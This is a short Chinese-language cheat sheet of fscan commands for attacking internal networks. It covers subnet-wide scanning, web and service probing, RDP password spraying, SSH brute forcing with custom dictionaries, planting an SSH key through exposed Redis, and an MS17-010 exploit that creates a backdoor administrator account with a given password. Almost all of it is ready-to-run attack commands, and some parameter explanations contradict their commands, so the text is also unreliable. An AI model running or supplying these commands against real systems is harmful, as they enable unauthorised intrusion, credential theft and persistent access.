1) 一把梭

fscan -t 150 -time 5 -h 192.168.0.0/16

参数解释

-t 150:设置扫描的线程数为150 -time 5:设置扫描的超时时间为5秒 -p service:指定扫描的服务类型为常规服务 -h 192.168.0.0/16:指定扫描的目标网络范围

2) Web服务探测

fscan -t 100 -time 5 -wt 8 -p web -h 192.168.0.1/24

参数解释

-wt 8:设置Web服务探测的超时时间为15秒 -p web:指定扫描的服务类型为Web服务

3) 服务检测

fscan -t 100 -time 5 -p service -nobr -noredis -np -hf ips.txt

参数解释

-noredis:不扫描Redis服务 -hf ips.txt:指定扫描的目标IP地址列表

4) 密码喷洒

fscan -m rdp -user administrator -pwd P@ssword -hf rdp.txt

参数解释

-m rdp:指定扫描的服务类型为RDP -user administrator:指定要尝试的用户名 -pwd P@ssword:指定要尝试的密码

5) 弱口令检测

fscan -m ssh -hf ssh.txt

爆破参数说明

-usera string:在默认用户列表基础上添加自定义用户名 -pwda string:在默认密码列表基础上添加自定义密码 -userf string:从文件中读取用户名字典 -pwdf string:从文件中读取密码字典

6) 漏洞利用

Redis写公钥

fscan -p 6379 -rf /root/.ssh/id_rsa.pub -hf redis.txt

MS17-010利用

执行此命令后会生成一个用户,用户名:sysadmin 密码:'1qaz@WSX!@#4'

fscan -h 192.168.1.1 -m ms17010 -sc add